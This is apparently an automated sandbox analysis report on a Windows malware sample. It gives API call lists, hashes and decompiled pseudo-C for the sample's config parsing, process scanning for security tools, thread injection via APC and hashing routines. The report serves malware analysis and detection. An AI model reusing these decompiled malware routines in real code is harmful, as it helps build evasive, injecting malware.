              • Part of subcall function 00781FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00781C63), ref: 00782022
              • Part of subcall function 0078154D: RtlAllocateHeap.NTDLL(00000000,?,00781477), ref: 00781559
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00781C8D
            • Sleep.KERNEL32(00000000,00000030), ref: 00781CD4
            • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00781CFC
            • GetSystemDefaultUILanguage.KERNEL32 ref: 00781D06
            • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00781D19
            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00781D8E
            • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00781DA4
            • GetLastError.KERNEL32 ref: 00781DB4
            • TerminateThread.KERNEL32(00000000,00000000), ref: 00781DBE
            • SetLastError.KERNEL32(00000000), ref: 00781DCA
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00781DD7
            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00781DE9
            • GetLastError.KERNEL32 ref: 00781DF4
            • GetLastError.KERNEL32 ref: 00781E05
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 1666582358-0
            • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction ID: 3a091a38ebfd1f54e40c2a3ff02f8e3006d786d4cf6eb5ba3d46278308717e95
            • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction Fuzzy Hash: 9051AF71A41614EBEB20FFB59D48AAFBB7DAB44752F904025F901E3154D738CE428BB4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E1D8A Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
            Download Yara Rule
            C-Code - Quality: 93%
            			E007E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t116;
				void* _t119;
				intOrPtr _t122;

				_t119 = __esi;
				_t116 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x7ea344; // 0x43175ac3
				if(E007E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
					 *0x7ea374 = _v8;
				}
				_t33 =  *0x7ea344; // 0x43175ac3
				if(E007E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x7ea344; // 0x43175ac3
				_push(_t116);
				if(E007E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
					L67:
					HeapFree( *0x7ea2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x7ea344; // 0x43175ac3
						_t45 = E007E36C5(_t104, _t102, _t98 ^ 0x523046bc);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x7ea2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x7ea344; // 0x43175ac3
						_t46 = E007E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x7ea2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x7ea344; // 0x43175ac3
						_t47 = E007E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x7ea2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x7ea344; // 0x43175ac3
						_t48 = E007E36C5(_t104, _t102, _t86 ^ 0x267c2349);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x7ea004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x7ea344; // 0x43175ac3
						_t49 = E007E36C5(_t104, _t102, _t82 ^ 0x167db74c);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x7ea02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x7ea344; // 0x43175ac3
						_t50 = E007E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
					}
					if(_t50 == 0) {
						L41:
						 *0x7ea2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x7ea344; // 0x43175ac3
								_t51 = E007E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E007E5B85(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E007E607C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x7ea344; // 0x43175ac3
								_t52 = E007E36C5(_t104, _t102, _t70 ^ 0x93710135);
							}
							if(_t52 != 0 && E007E5B85(0, _t52) != 0) {
								_t122 =  *0x7ea3cc; // 0x2f19600
								E007E5364(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x7ea344; // 0x43175ac3
								_t53 = E007E36C5(_t104, _t102, _t65 ^ 0x175474b7);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x7ea348; // 0x272d5a8
								_t22 = _t54 + 0x7eb5f3; // 0x616d692f
								 *0x7ea370 = _t22;
								goto L60;
							} else {
								_t64 = E007E5B85(0, _t53);
								 *0x7ea370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x7ea344; // 0x43175ac3
										_t56 = E007E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
									}
									if(_t56 == 0) {
										_t57 =  *0x7ea348; // 0x272d5a8
										_t23 = _t57 + 0x7eb899; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E007E5B85(0, _t56);
									}
									 *0x7ea3e0 = _t58;
									HeapFree( *0x7ea2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































            0x007e1d8a
            0x007e1d8a
            0x007e1d8a
            0x007e1d8a
            0x007e1d8d
            0x007e1daa
            0x007e1db8
            0x007e1db8
            0x007e1dbd
            0x007e1dd7
            0x007e2045
            0x007e204c
            0x007e2050
            0x007e2050
            0x007e1ddd
            0x007e1de2
            0x007e1dfa
            0x007e2032
            0x007e203c
            0x00000000
            0x007e1e00
            0x007e1e00
            0x007e1e01
            0x007e1e06
            0x007e1e1c
            0x007e1e08
            0x007e1e08
            0x007e1e15
            0x007e1e15
            0x007e1e1e
            0x007e1e27
            0x007e1e29
            0x007e1e33
            0x007e1e38
            0x007e1e38
            0x007e1e33
            0x007e1e3f
            0x007e1e55
            0x007e1e41
            0x007e1e41
            0x007e1e4e
            0x007e1e4e
            0x007e1e59
            0x007e1e5b
            0x007e1e65
            0x007e1e6a
            0x007e1e6a
            0x007e1e65
            0x007e1e71
            0x007e1e87
            0x007e1e73
            0x007e1e73
            0x007e1e80
            0x007e1e80
            0x007e1e8b
            0x007e1e8d
            0x007e1e97
            0x007e1e9c
            0x007e1e9c
            0x007e1e97
            0x007e1ea3
            0x007e1eb9
            0x007e1ea5
            0x007e1ea5
            0x007e1eb2
            0x007e1eb2
            0x007e1ebd
            0x007e1ebf
            0x007e1ec9
            0x007e1ece
            0x007e1ece
            0x007e1ec9
            0x007e1ed5
            0x007e1eeb
            0x007e1ed7
            0x007e1ed7
            0x007e1ee4
            0x007e1ee4
            0x007e1eef
            0x007e1ef1
            0x007e1efb
            0x007e1f00
            0x007e1f00
            0x007e1efb
            0x007e1f07
            0x007e1f1d
            0x007e1f09
            0x007e1f09
            0x007e1f16
            0x007e1f16
            0x007e1f21
            0x007e1f34
            0x007e1f34
            0x00000000
            0x007e1f23
            0x007e1f23
            0x007e1f2d
            0x00000000
            0x007e1f3e
            0x007e1f3e
            0x007e1f40
            0x007e1f56
            0x007e1f42
            0x007e1f42
            0x007e1f4f
            0x007e1f4f
            0x007e1f5a
            0x007e1f5c
            0x007e1f5f
            0x007e1f60
            0x007e1f67
            0x007e1f69
            0x007e1f6a
            0x007e1f6a
            0x007e1f67
            0x007e1f71
            0x007e1f87
            0x007e1f73
            0x007e1f73
            0x007e1f80
            0x007e1f80
            0x007e1f8b
            0x007e1f99
            0x007e1fa3
            0x007e1fa3
            0x007e1fab
            0x007e1fc1
            0x007e1fad
            0x007e1fad
            0x007e1fba
            0x007e1fba
            0x007e1fc5
            0x007e1fd8
            0x007e1fd8
            0x007e1fdd
            0x007e1fe3
            0x00000000
            0x007e1fc7
            0x007e1fca
            0x007e1fcf
            0x007e1fd6
            0x007e1fe8
            0x007e1fea
            0x007e2000
            0x007e1fec
            0x007e1fec
            0x007e1ff9
            0x007e1ff9
            0x007e2004
            0x007e2010
            0x007e2015
            0x007e2015
            0x007e2006
            0x007e2009
            0x007e2009
            0x007e2023
            0x007e2028
            0x007e202e
            0x00000000
            0x007e2031
            0x00000000
            0x007e1fd6
            0x007e1fc5
            0x007e1f2d
            0x007e1f21

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,007EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 007E1F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 007E2028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 007E203C
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 12556ff02d9077ec6b26712c57b802e25c5998915dd65be11565541e084a2e86
            • Instruction ID: f995b81a28e87fcf5857bc2a5bf5b3e10448c404a3c4cadf13a7f730ccb6d7df
            • Opcode Fuzzy Hash: 12556ff02d9077ec6b26712c57b802e25c5998915dd65be11565541e084a2e86
            • Instruction Fuzzy Hash: 5B819D70A031C4FBCB10EBB68DCAD5B77BDAB4C7007A48925B501DB251EA3DEE408765
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E30D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41processCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E007E30D5() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x7ea348; // 0x272d5a8
						_t2 = _t9 + 0x7ebe88; // 0x73617661
						_push( &_v264);
						if( *0x7ea12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









            0x007e30e0
            0x007e30ea
            0x007e30ee
            0x007e30f8
            0x007e3129
            0x007e30ff
            0x007e3104
            0x007e3111
            0x007e311a
            0x007e3131
            0x007e311c
            0x007e3124
            0x00000000
            0x007e3124
            0x007e3132
            0x007e3133
            0x00000000
            0x007e3133
            0x00000000
            0x007e312d
            0x007e3139
            0x007e313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007E30E5
            • Process32First.KERNEL32(00000000,?), ref: 007E30F8
            • Process32Next.KERNEL32(00000000,?), ref: 007E3124
            • CloseHandle.KERNEL32(00000000), ref: 007E3133
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID: |}~
            • API String ID: 420147892-2407928742
            • Opcode ID: 3a75d01201fdd7d3e10ff5e854e0157e7f6eb08246c2e209546d6875c1b3538b
            • Instruction ID: 337a90cb8dd1821a4a4a9ba014b1ec33a13997a2c82cd366ead39361bd172804
            • Opcode Fuzzy Hash: 3a75d01201fdd7d3e10ff5e854e0157e7f6eb08246c2e209546d6875c1b3538b
            • Instruction Fuzzy Hash: 12F0BB321035D8AAD720A7679C4DEEB37ACDFCD350F010065FA45C7001EA3CDB5686A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401D68() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










            0x00401d69
            0x00401d77
            0x00401d7d
            0x00401d84
            0x00401ddb
            0x00401ddb
            0x00401d86
            0x00401d8e
            0x00401d9b
            0x00401d9b
            0x00401dd7
            0x00401dd9
            0x00000000
            0x00000000
            0x00000000
            0x00401d90
            0x00401d97
            0x00401d9d
            0x00401d9d
            0x00401da2
            0x00401db0
            0x00401db5
            0x00401dbb
            0x00401dc1
            0x00401dc8
            0x00401dca
            0x00401dca
            0x00401dd4
            0x00401d99
            0x00401d99
            0x00000000
            0x00401d99
            0x00401d97

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0078092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .$GetProcAddress.$l
            • API String ID: 0-2784972518
            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction ID: 1050865b8f551beb30e40799f8e93d2cdd75059be690525d97bedd8af62775e7
            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction Fuzzy Hash: 83318AB6900609CFDB10DF99C884AAEBBF9FF08324F25404AD841A7311D775EA49CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E16DF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 611COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 49%
            			E007E16DF(void* __ecx, void* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t1 =  &_a4; // 0x7e544b
				_t226 =  *_t1;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t683 =  *(_t226 + 4);
				_t402 =  *(_t226 + 8);
				_t349 =  *(_t226 + 0xc);
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
